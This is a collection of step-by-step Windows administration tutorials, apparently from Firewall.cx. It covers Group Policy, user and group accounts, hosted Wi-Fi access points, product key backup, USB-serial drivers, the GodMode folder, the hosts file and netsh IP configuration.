Security settings: Allows you to set security options for users and computers to restrict them to run files based on path, hash, publisher criteria or URL zone.

Software restrictions: Allows you to create a policy that would restrict users running unwanted applications and protect computers against virus and hacking attacks.

Software distribution and installation: Allows you to either assign or publish software application to domain users centrally with the help of a group policy.

Roaming user profiles: Allows mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.

Internet Explorer maintenance: Allows administrators to manage the IE settings of the users' computers in a domain by setting the security zones, privacy settings and other parameters centrally with the help of group policy.

Using Local Group Policy

Local Group Policies affect only the users who log in to the local machine but domain-based policies affect all the users of the domain. If you are creating domain-based policies then you can create policy at three levels: sites, domains and OUs. Besides, you have to make sure that each computer must belong to only one domain and only one site.

A Group Policy Object (GPO) is stored on a per domain basis. However, it can be associated with multiple domains, sites and OUs and a single domain, site or OU can have multiple GPOs. Besides this, any domain, site or OU can be associated with any GPO across domains.

When a GPO is defined it is inherited by all the objects under it and is applied in a cumulative fashion successively starting from local computer to site, domain and each nested OU. For example if a GPO is created at domain level then it will affect all the domain members and all the OUs beneath it.

After applying all the policies in hierarchy, the end result of the policy that takes effect on a user or a computer is called the Resultant Set of Policy (RSoP).

To use GPOs with greater precision, you can apply Windows Management Instrumentation (WMI) filters and Discretionary Access Control List (DACL) permissions. The WMI filters allow you to apply GPOs only to specific computers that meet a specific condition. For example, you can apply a GPO to all the computers that have more than 500 MB of free disk space. The DACL permissions allow you to apply GPOs based on the user's membership in security groups.

Windows Server 2003 provides a GPMC (Group Policy Management Console) that allows you to manage group policy implementations centrally. It provides a unified view of local computer, sites, domains and OUs (organizational units). You can have the following tools in a single console:

  • Active Directory Users and Computers
  • Active Directory Sites and Services
  • Resultant Set of Policy MMC snap-in
  • ACL Editor
  • Delegation Wizard

The screenshot below shows four tools in a single console.

tk-windows-gp-local-1

 

A group policy can be configured for computers or users or both, as shown here:

tk-windows-gp-local-2

The Group Policy editor can be run using the gpedit.msc command.

Both the policies are applied at the periodic refresh of Group Policies and can be used to specify the desktop settings, operating system behavior, user logon and logoff scripts, application settings, security settings, assigned and published applications options and folder redirection options.

Computer-related policies are applied when the computer is rebooted and User-related policies are applied when users log on to the computer.

Configuring a Local Group Policy

To configure a local group policy, you need to access the group policy editor. You can use Group Policy Editor by logging in as a local administrator from any member server of a domain or a workgroup server but not from a domain controller.

Sometimes this tool, or other Active directory tools that you need to manage group policy, does not appear in Administrative Tools. In that case you need to follow steps 1-10 given below to add Group Policy Editor tool in the console.

1. Click Start->Run and type mmc. The Console window appears, as shown below:

2. Select Add/remove Snap-in from the File menu. 

tk-windows-gp-local-3

 

The Add/Remove Snap-in window appears, as shown below:

3. Click Add.

4. The Add Standalone Snap-in window appears.

5. Select Group Policy Object Editor snap-in from the list.

6. Click Add and then click OK in Add/remove Snap-in window.

tk-windows-gp-local-4

 

The Select Group Policy Object window appears, as shown below:

7. Keep the default value “Local Computer

8. Click Finish.

tk-windows-gp-local-5

 

The Local Computer Policy MMC appears, as shown below.

You can now set the Computer Configuration or User Configuration policies as desired. This example takes User Configuration setting.

9. Expand User Configuration node:

tk-windows-gp-local-6

 

10. Expand Administrative Templates and then select the Start Menu and Taskbar node, as shown in Figure 7.

11. Double-click the settings for the policy that you want to modify from the right panel. In this example double-click Remove Run Menu from Start Menu.

tk-windows-gp-local-7

 

The properties window of the setting appears as shown in the below screenshot:

12. Click Enabled to enable this setting.

tk-windows-gp-local-8

Once you click on 'OK', the local policy that you have applied will take effect and all the users who would log on to this computer will not be able to see the Run menu item of the Start menu.

This completes our Local Group Policy configuration section. Next section covers Domain Group Policies, that will help you configure and control user access throughout the Active Directory Domain.

Article Summary

Group Policies are an Administrator's best friend. Group Policies can control every aspect of a user's desktop, providing enhanced security measures and restricting access to specified resouces. Group policies can be applied to a local server, as shown on this article, or to a whole domain.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

 

  • Hits: 76281

Creating Windows Users and Groups with Windows 2003

In a Windows server environment, it is very important that only authenticated users are allowed to log in for security reasons. To fulfill this requirement the creation of User accounts and Groups is essential.

User Accounts

In Windows Server 2003 computers there are two types of user accounts. These types are local and domain user accounts. The local user accounts are the single user accounts that are locally created on a Windows Server 2003 computer to allow a user to log on to a local computer. The local user accounts are stored in Security Accounts Manager (SAM) database locally on the hard disk. The local user accounts allow you to access local resources on a computer

On the other hand the domain user accounts are created on domain controllers and are saved in Active Directory. These accounts allow to you access resources anywhere on the network. On a Windows Server 2003 computer, which is a member of a domain, you need a local user account to log in locally on the computer and a domain user account to log in to the domain. Although you can have a same login and password for both the accounts, they are still entirely different account types.

You become a local administrator on your computer automatically because local computer account is created when a server is created. A domain administrator can be local administrator on all the member computers of the domain because by default the domain administrators are added to the local administrators group of the computers that belong to the domain.

This article discusses about creating local as well as domain user accounts, creating groups and then adding members to groups.

Creating a Local User Account

To create a local user account, you need to:

1. Log on as Administrator, or as a user of local administrator group or Account Operators local group in the domain.

2. Open Administrative Tools in the Control Panel and then click Computer Management, as shown in Figure 1.

tk-windows-user-groups-1

Figure 1

 

3. Click Users folder under Local Users and Groups node, as shown in Figure 2.

tk-windows-user-groups-2

Figure 2

4. Right-click Users and then click New User in the menu that appears, as shown in Figure 3:

tk-windows-user-groups-3

Figure 3

The New User dialog box appears as shown below in Figure 4.

5. Provide the User name and the Password for the user in their respective fields.

6. Select the desired password settings requirement.

Select User must change password at next logon option if you want the user to change the password when the user first logs into computer. Select User cannot change password option if you do not want the user to change the password. Select Password never expires option if you do not want the password to become obsolete after a number of days. Select Account is disabled to disable this user account.

7. Click Create , and then click Close:

tk-windows-user-groups-4

 Figure 4

The user account will appear on clicking Users node under Local Users and Groups on the right panel of the window.

You can now associate the user to a group. To associate the user to a group, you need to:

8. Click Users folder under Local Users and Groups node.

9. Right-click the user and then select Properties from the menu that appears, as shown in Figure 5:

tk-windows-user-groups-5

 Figure 5

The Properties dialog box of the user account appears, as shown in Figure 6:

10. Click Member of tab.

The group(s) with which the user is currently associated appears.

11. Click Add.

tk-windows-user-groups-6

 Figure 6

The Select Groups dialog box appears, as shown in Figure 7.

12. Select the name of the group/object that you want the user to associate with from the Enter the object names to select field.

If the group/object names do not appear, you can click Advanced button to find them. Also if you want to choose different locations from the network or choose check the users available, then click Locations or Check Names buttons.

13. Click OK .

tk-windows-user-groups-7

Figure 7

The selected group will be associated with the user and will appear in the Properties window of the user, as shown in Figure 8:

tk-windows-user-groups-8

Figure 8

Creating a Domain User Account

The process of creating a domain user account is more or less similar to the process of creating a local user account. The only difference is a few different options in the same type of screens and a few steps more in between.

For example you need Active Directory Users and Computers MMC (Microsoft Management Console) to create domain account users instead of Local Users and Computers MMC. Also when you create a user in domain then a domain is associated with the user by default. However, you can change the domain if you want.

Besides all this, although, a domain user account can be created in the Users container, it is always better to create it in the desired Organization Unit (OU).

To create a domain user account follow the steps given below:

1. Log on as Administrator and open Active Directory Users and Computers MMC from the Administrative Tools in Control Panel, as shown in Figure 9.

2. Expand the OU in which you want to create a user, right-click the OU and select New->User from the menu that appears.

tk-windows-user-groups-9

 Figure 9

3. Alternatively, you can click on Action menu and select New->User from the menu that appears.

The New Object –User dialog box appears, as shown in Figure 10.

4. Provide the First name, Last name, and Full name in their respective fields.

5. Provide a unique logon name in User logon name field and then select a domain from the dropdown next to User logon name field if you want to change the domain name.

The domain and the user name that you have provided will appear in the User logon name (pre-Windows 2000) fields to ensure that user is allowed to log on to domain computers that are using earlier versions of Windows such as Windows NT.

tk-windows-user-groups-10

Figure 10

6. Click Next.

The second screen of New Object –User dialog box appears similar to Figure 4.

7. Provide the User name and the Password in their respective fields.

8. Select the desired password settings requirement:

Select User must change password at next logon option if you want the user to change the password when the user first logs into computer. Select User cannot change password option if you do not want the user to change the password. Select Password never expires option if you do not want the password to become obsolete after a number of days. Select Account is disabled to disable this user account.

9. Click Next.

10. Verify the user details that you had provided and click Finish on the third screen of New Object –User dialog box.

11. Follow the steps 9-13 mentioned in Creating a Local User Account section to associate a user to a group.

Creating Groups

Just like user accounts, the groups on a Windows Server 2003 are also of two types, the built in local groups and built in domain groups. The example of certain built in domain groups are: Account Operators, Administrators, Backup Operators, Network Configuration Operators, Performance Monitor Users, and Users. Similarly certain built in local groups are: Administrators, Users, Guests, and Backup operators.

The built-in groups are created automatically when the operating system is installed and become a part of a domain. However, sometimes you need to create your own groups to meet your business requirements. The custom groups allow you limit the access of resources on a network to users as per your business requirements. To create custom groups in domain, you need to:

1. Log on as Administrator and open Active Directory Users and Computers MMC from the Administrative Tools in Control Panel, as shown in Figure 9.

2. Right-click the OU and select New->Group from the menu that appears.

The New Object –Group dialog box appears, as shown in Figure 10.

3. Provide the name of the group in the Group name field.

The group name that you have provided will appear in the Group name (pre-Windows 2000) field to ensure that group is functional on domain computers that are using earlier versions of Windows such as Windows NT.

4. Select the desired group scope of the group from the Group scope options.

If the Domain Local Scope is selected the members can come from any domain but the members can access resources only from the local domain.

If Global scope is selected then members can come only from local domain but can access resources in any domain.

If Universal scope is selected then members can come from any domain and members can access resources from any domain.

5. Select the group type from the Group Type options.

The group type can be Security or Distribution . The Security groups are only used to assign and gain permissions to access resources and Distribution groups are used for no-security related tasks such as sending emails to all the group members.

tk-windows-user-groups-11

Figure 11

6. Click OK.

You can add members to group just as you add groups to members. Just right-click the group in Active Directory Users and Computers node in the Active Directory Users and Computers snap-in, select Properties, click Members tab from the Properties window of the group and then follow the steps from 11-13 from Creating Local User Accounts section.

Article Summary

Dealing with User & Group accounts in a Windows Server environment is a very important everyday task for any Administrator. This article covered basic administration of user and group accounts at both local and domain environments.

  • Hits: 99595

How to Add and Remove Applications from Windows 8 / 8.1 Start Screen

In this article, we'll show you how to add (pin) and remove (unpin) any application from the Windows 8 or Windows 8.1 Metro Start Screen. Tiles or the small squares and rectangles appearing on the Windows 8 Metro Start Screen, represent different programs that you can access by either tapping or clicking on them. The Windows Metro Start screen contains its default tiles, however users have the ability to add or remove  tiles (application shortcuts) to meet their requirements. Adding tiles to the Metro Start screen is called pinning while removing them from the Metro Start screenis called unpinning.

Pinning Apps & Programs To The Windows 8 Metro Start Screen

To pin a Windows application or a Metro App to the Start screen, you have to find it first. For this, tap/click on the Search icon and type the name of the application or the program that you wish to add.

For example, type “Paint” to search for the Windows Paint application as shown below. Once found tap/click on the Apps option:

windows-8-add-remove-application-from-start-screen-01
Figure 1. Searching for Application

Search will come up with the search result for the Paint program, as indicated on the left of the screen. Right-click on the search result or hold your finger on it until a check mark appears besides it and a panel opens up at the bottom of the screen:

windows-8-add-remove-application-from-start-screen-02
Figure 2. Pinning the Application on Windows 8

The Panel offers two options for pinning – Pin to taskbar and Pin to Start. If you like to see the icon of the application on the taskbar on your Windows Desktop, you can tap/click on Pin to taskbar. We want to pin it to the Metro Start screen so Tap/click on the icon Pin to Start, for this article.

The bottom panel now disappears and you can open the application from the icon on the screen. Instead if you would like to go back to the Start screen, click on the bottom left hand corner or swipe in from the right edge of the screen. Now, tap/click on the Start icon. Verify that the application icon has appeared on the Metro Start screen:

windows-8-add-remove-application-from-start-screen-03 
Figure 3. Pinned Application on Windows Metro Start Screen

Unpinning Apps & Programs From The Windows 8 Metro Start Screen

To unpin an application from the Windows Metro Start screen, right-click on its tile or hold your finger on it until a check mark appears besides it and a panel opens up at the bottom of the screen:

windows-8-add-remove-application-from-start-screen-04
Figure 4. Unpin an Application from Windows Metro Start Screen

Tap/click on Unpin from Start and the icon of the selected program will vanish from the screen along with the panel.

Alternate Way To Pin Or Unpin Apps & Programs On The Windows 8 Metro Start Screen

There is another way by which you can pin/unpin most programs on the Windows 8 Metro Start screen.

Windows may not be able to find every program when you search for it. However, Windows 8 provides a very easy method for looking at all the programs available in your system in one screen. Then you can decide all those you want to pin as tiles on the Metro Start screen.

On the Metro Start screen, tap/right-click on any empty space (not covered by any tile) - a bar will appear at the bottom of the screen. Tap/click on the only icon in the bar: All apps. A new Apps screen will open up showing icons of all the apps and programs available in your computer, neatly divided into groups.

windows-8-add-remove-application-from-start-screen-05 
Figure 5. All Apps Windows 8/8.1 Screen

Right-click on any icon or hold your finger on it until a check mark appears besides it and a panel opens up at the bottom of the screen, as in Figure 2.

Now you can choose to pin the app to the Start screen or the Task Bar. Moreover, if the app is already pinned, the panel will allow you to unpin it. Continue doing this to all the apps you want on the Start screen.
Once you are done, tap/click on the All apps icon and you will be back in the Metro Start screen along with all the application tiles you had selected.

Conclusively in this article we learned how to add (pin) or remove (unpin) Tiles or all the small squares and rectangles appearing on the Windows 8 Metro Start Screen to suit our requirements. More articles on Windows 8 & Windows 8.1 can be found in our Windows Workstation section.

  • Hits: 14804

Configure Windows 8 & 8.1 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows 8 into an Access Point

windows-8-secure-access-point-1-preWindows 8 and Windows 8.1 (including Professional edition) operating systems provide the ability to turn your workstation or laptop into a secure wireless access point, allowing wireless clients (including mobile devices) to connect to the local network or Internet. This feature can save you time, money and frustration when there is need to connect wireless devices to the network or Internet but there is no access point available.

In addition, using the method described below, you can turn your Windows system into a portable 3G router by connecting your workstation to your 3G provider (using your USB HSUPA/GPRS stick).

Windows 7 users can visit our article Configuring Windows 7 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows into an Access Point

To begin, open your Network Connections window by pressing Windows Key + R combination to bring up the Run window, and type ncpa.cpl and click OK:

windows-8-secure-access-point-1
Figure 1. Run Command – Network Connections

 The Network Connection window will appear, displaying all network adapters the system current has installed:

windows-8-secure-access-point-2
Figure 2. Network Connections

Let’s now create our new wireless virtual adapter that will be used as an access point for our wireless clients. To do this, open an elevated Command prompt (cmd) by right-clicking on the Window 8 start button located on the lower left corner of the desktop and select Command Prompt (Admin). If prompted by the User Account Control protection, simply click on Yes to proceed:

windows-8-secure-access-point-3
Figure 3. Opening an elevated Command Prompt

Once the command prompt is open, enter the following command to create the wireless network (SSID). The encryption used by default is WPA2-PSK/AES:

C:\windows\system32> netsh wlan set hostednetwork mode=allow ssid=Firewall.cx key=$connect$here

When the command is entered, the system will return the following information:

The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.
In our example, the Wi-Fi (SSID) is named Firewall.cx and has a password of $connect$here.
 
The system information above confirms the creation of the wireless network and creates our virtual adapter which will be visible in the Network Connection window after the virtual adapter is enabled with the following command:

C:\windows\system32> netsh wlan start hostednetwork

Again, the system will confirm the wireless network has started with the below message:

The hosted network started.

Looking at the Network Connection window we’ll find our new adapter labeled as Local Area Connection 4. Right under the adapter is the SSID name of the wireless network created by the previous command:

windows-8-secure-access-point-4
Figure 4. Network Connections – Our new adapter appears

At this point, our new wireless network (Firewall.cx) should be visible to all nearby wireless clients.

Next, we need to enable Internet sharing on the network adapter that has Internet access. In our case this is the Ethernet adapter. Users accessing the Internet via their mobile broadband adapter should select their broadband adapter instead.

To enable Internet sharing, right-click on the Ethernet network adapter and select properties from the context menu, as shown below:

windows-8-secure-access-point-5Figure 5. Network Connections – Ethernet Adapter Properties

Once the Ethernet adapter properties window appears, select the Sharing tab and tick the Allow other network users to connect through this computer’s Internet connection then select the newly created virtual adapter labelled Local Area Connection 4:

windows-8-secure-access-point-6Figure 6. Enabling sharing and selecting the newly created virtual adapter

Be sure to untick the second option below (not clearly visible in above screenshot): Allow other network users to control or disable the shared Internet connection, then click on OK.

Notice our Ethernet adapter now has the word Shared in its description field:

windows-8-secure-access-point-7
Figure 7. Our Ethernet adapter now appears to be shared

At this point, clients that have successfully connected to our wireless SSID Firewall.cx should have Internet access.

Note that in some cases, it might be required to perform a quick restart of the operating system before wireless clients have Internet access. Remember that in case of a system restart, it is necessary to enter all command prompt commands again.

The command below will help verify the wireless clients connected to our Windows 8 access point:

C:\windows\system32> netsh wlan show hostednetwork
windows-8-secure-access-point-8
Figure 8. Information on our Windows 8 access point

As shown above, we have one wireless client connected to our Windows 8 access point. Windows 8 will support up to 100 wireless clients, even though that number is extremely likely to ever be reached.

This article showed how to turn your Windows 8 & Windows 8.1 operating system into a wireless access point, allowing wireless clients to connect to the Internet or Local LAN.

  • Hits: 24206

Revealing & Backing Up Your Windows 8 – Windows 8.1 Pro License Product Key

windows-8-backup-license-product-key-1aBacking up your Windows License Product Key is essential for reinstallation of your Windows 8 or Windows 8.1 operating system. In some cases, the Genuine Microsoft Label or Certificate Of Authenticity (COA) containing the product key, is placed in an area not easily accessible by users e.g inside the battery compartment in newer ultrabooks/laptops, making it difficult to note the product key.

In this article, we’ll show you how to easily download and store your Windows License Product Key inside a text file with just two clicks!

The information displayed under the System Information page in Windows 8 and Windows 8.1 (including professional editions), includes the Windows edition, system hardware (CPU, RAM), Computer name and Windows activation status. The Windows activation status section shows us if the product is activated or not, along with the Product ID:

windows-8-backup-license-product-key-1

Figure 1. System Information does not show the Product Key

Product Keys and Product IDs are two completely different things, despite the similarity of the terms.

The 20 character Product *ID* is created during the installation process and is used to obtain/qualify for technical support from Microsoft and is of no use during the installation process.

To reveal your Product Key, which is the 20 character ID used during the installation process, simply download and execute the script provided on the second page of our Administrative Utilities Download section.

Once you have downloaded and unzipped the file, double-click on the Windows Key.vbs file to execute the script. Once executed, a popup window will display your Product Name, Product ID and hidden Product Key:

windows-8-backup-license-product-key-2Figure 2. Running the script reveals our Product Key

At this point, you can save the displayed information by clicking on the ‘Yes’ button. This will create a text file with the name “Windows Product Key.txt” and save it in the same location from where the script was executed:

windows-8-backup-license-product-key-3Figure 3. Saving your Windows information to a text file

We should note that every time the script is executed and we select to save the information, it will overwrite the contents of the previous text file. This is important in case you decide to update your Windows with a new product key e.g moving from Windows 8.1 to Windows 8.1 Professional. In this case it would be advisable to rename the previously produced text file before executing the script and saving its information.

This article showed how to reveal and save the Windows Product Key information of your Windows 8 and Windows 8.1 operating system. We also explained the difference between the 20 Digit Product ID, shown in the System Information window, and Product Key.

  • Hits: 27160

Installing The ‘Unsupported’ Profilic USB-to-Serial Adapter PL-2303HXA & PL-2303X on Windows 8 & 8.1

profilic-pl2303-driver-installation-windows8-1aThanks to the absence of dedicated serial ports on today’s laptops and ultrabooks, USB-to-Serial adapters are very popular amongst Cisco engineers as they are used to perform the initial configuration of a variety of Cisco equipment such as routers, catalyst switches, wireless controllers (WLC), access points and more, via their Console Port. The most common USB-to-Serial adapters in the market are based on Profilic’s PL2303 chipset.

With the arrival of Windows 8, Windows 8.1 and upcoming Windows 10, Profilic has announced that these operating systems will not support USB-to-Serial adapters using the PL-2303HXA & PL-2303X chipsets, forcing thousands of user to buy USB-to-Serial adapters powered by the newer PL-2303HXD (HX Rev D) or PL2303TA chipset.

The truth is that PL-2303HXA & PL-2303X chipsets are fully supported under Windows 8 and Windows 8.1 and we’ll show you how to make use of that old USB-to-Serial adapter that might also hold some special sentimental value.

Make sure to download our Profilic Windows 8/8.1 x64bit Drivers from our Administrative Tools section

We took our old USB-to-Serial adapter and plugged it in our ultrabook running Windows 8.1. As expected, the operating system listed the hardware under Device Manager with an exclamation mark:

profilic-pl2303-driver-installation-windows8-1Figure 1. Prolific Adapter in Device Manager

A closer look at the properties of the USB-to-Serial adapter reveals the popular Code 10 error which means that the device fails to start:

profilic-pl2303-driver-installation-windows8-2Figure 2. Prolific Adapter Error Code 10

Getting That Good-old USB-to-Serial Adapter To Work

Assuming you’ve successfully downloaded and unzipped the Profilic Windows 8/8.1 x64bit drivers from our Administrative Tools section, go back to the Device Manager and right click on the Prolific USB-to-Serial Comm Port with the exclamation mark and select Update Driver Software:

profilic-pl2303-driver-installation-windows8-3Figure 3. Updating the Drivers from Device Manager

Next, select Browse my computer for driver software from the next window:

profilic-pl2303-driver-installation-windows8-4Figure 4. Select Browse my computer for driver software

Next, browse to the folder where you’ve unzipped the provided drivers, click on the Include Subfolders option and select Let me pick from a list of device drivers on my computer:

profilic-pl2303-driver-installation-windows8-5Figure 5. Select Let me pick from a list of device drivers on my computer

Next, select the driver version 3.3.2.102 dated 24/09/2008 as shown below and click Next:

profilic-pl2303-driver-installation-windows8-6Figure 6. Install Driver version 3.3.2.102

Once complete, Windows will confirm the successful installation of our driver as shown below:

profilic-pl2303-driver-installation-windows8-7Figure 7. Driver successfully installed

Closing the window, we return back to the Device Manager where we’ll notice the exclamation mark has now disappeared and our old ‘Unsupported’ USB-to-Serial adapter is fully operational:

profilic-pl2303-driver-installation-windows8-8Figure 8. Fully operational USB-to-Serial adapter

This article showed how successfully install your old USB-to-Serial adapter based on the Profilic PL-2303HXA & PL-2303X chipsets on Windows 8 and Windows 8.1 operating systems. Despite the fact Profilic clearly states that these chipset are not supported with the latest Windows, forcing users to purchase new adapters powered by their new chipsets, we’ve proven that this is not true and showed how to make the old Profilic USB-to-Serial adapter work with the drivers available on Firewall.cx.

 

 



  • Hits: 80102

How to Enable Master Control Panel or Enable God Mode in Windows 7, 8 & 8.1

Around 2007, an undocumented feature of Windows, called the God Mode, was published outside of documentation provided by Microsoft. This is the Windows Master Control Panel shortcut. Bloggers named it the All Tasks or the God Mode and it gained popularity as it provided a method of creating a shortcut to various control settings in Windows Vista at the time. Later Windows Operating Systems such as Windows 7, Windows 8 and Windows 8.1 also carry this feature, except the 64-bit version of Windows Vista. It is known that this functionality crashes the Explorer in the 64-bit version of Windows Vista.

Although not intended for use by general users, God Mode or Master Control Panel functionality in Windows is implemented by creating a base folder with a special extension. The format used is:

  <FolderDisplayName>.{<GUID>}

Here, GUID represents a valid Class ID or CLSID that has a System.ApplicationName entry in the Windows Registry. Microsoft documents this technique as “Using File System Folders as Junction Points.FolderDisplayName can be anything - when this technique was discovered, the name GodMode coined by bloggers stuck. Among the many GUID shortcuts revealed in Windows, the CLSID {ed7ba470-8e54-465e-825c-99712043e01c} is of special interest as the related widget points to and permits access to several Windows settings or Control Panel applets.

Users can now create a control panel called GodMode that allows them easy access to almost all the administrative tasks in Windows. In fact, GodMode is so named as users have complete access to all aspects of the management of Windows at their fingertips and in one location. That makes it very convenient to configure the hardware or windows settings quickly from a single screen. You access GodMode by creating a special folder on the desktop.

Arrive at the Windows desktop by closing all the open windows. Right-click on an empty part of the desktop or hold your finger there. In the menu that comes up, tap/click on New and then on the Folder option:

windows-enable-master-control-panel-god-mode-1 Figure 1. Creating a New Folder

You will see a new folder appear on the desktop and the title of the folder will be in edit mode. Modify the title of the new folder, or rename it to:

 GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Once renames, the icon will change as shown below:

windows-enable-master-control-panel-god-mode-2Figure 2. Create a new folder & rename it to reveal GodMode

 You must double-click/tap on the icon to open the GodMode Screen:

windows-enable-master-control-panel-god-mode-3Figure 3. The GodMode Screen

You can now proceed to tweak Windows using the list of available configuration options presented simply by scrolling through and tapping/clicking the option you want.

If you no longer need to have GodMode in your system, you can safely  delete the GodMode folder on your desktop. 

This article showed how to enable GodMode on Windows Vista (32Bit only), and both 32/64 Bit versions of Windows 7, Windows 8 and Windows 8.1.

  • Hits: 20982

The Importance of Windows Hosts File - How to Use Your Hosts File on Windows Workstations and Windows Servers

This article explains how the Windows operating system makes use of the popular Host file, where it is located for various operating systems, how it can be used to manipulate DNS lookups and redirect DNS lookups to different IP addresses and hosts.

What Is The Domain Name System?

The Internet uses a standard domain name resolution service called the DNS or the Domain Name System. All devices on the Internet have a unique IP address, much like the postal addresses people use. On the Internet, any device wanting to connect to another can do so only by using the IP address of the remote device. To know the remote IP address, the device has first to resolve the remote domain name to its mapped IP address by using DNS.

The device queries the DNS server, usually configured by the local router, by requesting the server for the IP address of that specific remote domain name. In turn, the DNS server may have to query other similar servers on the Internet until it is able to locate the correct information for that domain name. The DNS server then returns the remote IP address to the device. Finally, the device opens a connection directly to the remote IP address to perform the necessary operations.

An Alternative Method – The 'Hosts' File

Querying the DNS server to connect to a remote device can be a time-consuming process. An alternative faster method is to look up the hosts file first. This is like the local address book in your mobile, which you can consult for quickly calling up commonly used telephone numbers. All operating systems use a hosts file to communicate via TCP/IP, which is the standard of communication on the Internet. In the hosts file, you can create a mapping between domain names and their corresponding IP addresses.

You can view the contents of the hosts file in a text editor. Typically, it contains IP addresses and corresponding domain names separated by at least one space, and each entry on its own line. By suitably manipulating the contents of the hosts file, it is very easy to interchange the IP address mappings of Google.com and Yahoo.com, such that when searching for Yahoo your browser will point to Google and vice versa!

Most operating systems, including Microsoft Windows, are configured to give preference to the hosts file over the DNS server queries. In fact, if your operating system finds a mapping for a domain name in its hosts file, it will use that IP address directly and not even bother to query the DNS server. Whatever entries you add to your hosts file, they start working immediately and automatically. You will not need to either reboot or enter any additional command to make the operating system start using the entries in the hosts file.

Understanding Domain Name Resolution On Windows

Windows machines may not always have a hosts file, but they will have a sample hosts file named as lmhosts.sam. You will find the hosts file and lmhosts.sam file in the following location for all Windows opertating systems, including Server editions:

c:\ Windows\System32\drivers\etc\hosts

windows-hosts-file-usage-and-importance-1Figure 1. Hosts & lmhosts.sam files in File Explorer

In case the hosts file is missing, you can copy the lmhosts file to hosts and use it as you wish after editing it in Notepad.

Getting The Most Out Of Your Hosts File

The Windows hosts file is a great help in testing new machines or deployment servers. You may want to set up and test online servers, but have them resolving only for your workstation. For example, your true web server may have a domain name www.firewall.cx, while you may have named your development server development.firewall.cx.

To connect to the development server from a remote location, you could change www.firewall.cx in your public DNS server to point to development.firewall.cx, or add an additional entry in the public DNS server. The problem with this method is that although you would be able to log into your development server, so would everyone else as the DNS server is publicly accessible.

So, instead of adding or changing resource records on your public DNS server, you can modify the hosts file on the computer that you will be using for connecting to the remote development server. Simply add an entry in the hosts file to map development.firewall.cx or even www.firewall.cx to the IP address of your development server. This will let your test bed computer connect to your development server without making the server publicialy discoverable via DNS.

Another great usage of the hosts file is to block Spyware and/or Ad Networks. Add all the Spyware sites & Ad Networks domain names in the Windows hosts file and map them to the IP address 127.0.0.1, which will always point back to your machine. That means your browser will be unable to reach these sites or domains. This has a dual benefit.

You can download ready-made hosts files that list large numbers of known ad servers, banner sites, sites giving tracking cookies, sites with web bugs and infected sites. You can find such hosts files on the Hosts File Project. Before using one of these files in your computer, it would be advisable to backup the original file first. Although using the downloadable hosts files is highly recommended, one must keep in mind that large hosts files may slow down your system.

Usually, Windows uses a DNS Client for caching previous DNS requests in memory. Although this is supposed to speed up the process, having simultaneously to read the entire hosts file into the cache may cause the computer to slow down. You can easily fix this by turning off and disabling the unnecessary DNS Client from the Services control panel under the Administrative Tools.

Conclusion

The Windows hosts file can be found on all Window operating systems, including server editions. If used with care, the Windows hosts file can be a powerful tool. It can make your computer environment much safer by helping to block malicious websites and at the same time potentially increasing your browser speed.

 

  • Hits: 21530

How To Change & Configure An IP Address or Set to DHCP, Using The Command Prompt In Windows 7

Not many users are aware that Windows 7 provides more than one way to configure a workstation’s network adaptor IP address or force it to obtain an IP address from a DHCP server. While the most popular method is configuring the properties of your network adaptor via the Network and Sharing Center, the less popular and unknown way for most users is using the netsh Command Prompt. In this tutorial, we show you how to use the Command Prompt netsh command to quickly and easily configure your IP address or set it to DHCP.  Competent users can also create simple batch files (.bat) for each network (e.g home, work etc) so they can execute them to quickly make the IP address, Gateway IP and DNS changes.

In order to successfully change the IP address via Command Prompt, Windows 7 requires the user to have administrative rights. This means even if you are not the administrator, you must know the administrative password, since you will be required to use the administrative command prompt.

Opening The Administrative Command Prompt On Windows 7

To open the administrative command prompt in Windows 7, first click on the Start icon. In the search dialog box that appears, type cmd and right-click on the cmd search result displayed. On the menu that Windows brings up, click on the Run as administrator option as shown in the below screenshot:

windows-7-change-ip-address-via-cmd-prompt-1Figure 1. Running CMD as Administrator

Depending on your User Account Control Settings (UAC), Windows may ask for confirmation. If this happens, simply click on Yes and Windows will present the CLI prompt running in elevated administrator privileged mode:

windows-7-change-ip-address-via-cmd-prompt-2Figure 2.  The Administrative Command Prompt Windows 7

Using The ‘netsh’ Command Prompt To Change The IP Address, Gateway IP & DNS

At the Administrative Command Prompt, type netsh interface ip show config, which will display the network adapters available on your system and their names. Note down the name of the network adaptor for which you would like to set the static IP address.

windows-7-change-ip-address-via-cmd-prompt-3Figure 3.  Finding Our Network Adapter ID

In our example, we’ll be modifying the IP address of the interface named Wireless Network Connection, which is our laptop’s wireless network card.

Even if the Wireless Network Connection is set to be configured via DHCP, we can still configure a static IP address. Following is the command used to configure the interface with the IP address of 192.168.5.50 with a subnet mask of 255.255.255.0 and finally a Gateway of 192.168.5.1:

C:\Windows\system32> netsh interface ip set address "Wireless Network Connection" static 192.168.5.50 255.255.255.0 192.168.5.1

Next, we configure our primary DNS server using the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8

Note: When entering a DNS server, Windows will try to query the DNS server to validate it. If for any reason the DNS server is not reachable (therefore not validated), you might see the following error:

The configured DNS server is incorrect or does not exist

To configure the DNS server without requiring DNS Validation, use the validate=no parameter at the end of the command:

C:\Windows\system32> netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8 validate=no

This command forces the DNS server setting without any validation and therefor no error will be presented at the CLI output in case the DNS server is not reachable.

To verify our new settings, use the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip show config

At this point, we should see the network settings we configured, as shown below:

windows-7-change-ip-address-via-cmd-prompt-4Figure 4. Verifying Our New Network Settings

Using The 'netsh' Command Prompt To Set The Network Interface Card To DHCP

You can use the netsh command to switch your current adapter from static to DHCP.  To switch your network adaptor from static IP configuration to DHCP, use the following command:

C:\Windows\system32> netsh interface ip set address "Wireless Network Connection” dhcp

Windows will not return any confirmation after the command is entered, however if the network adaptor has successfully obtained an IP address and has Internet connection, there should not be any network icon with an exclamation mark in the taskbar notification area as shown below:

windows-7-change-ip-address-via-cmd-prompt-5Figure 5.  Wireless Icon with no Exclamation Mark

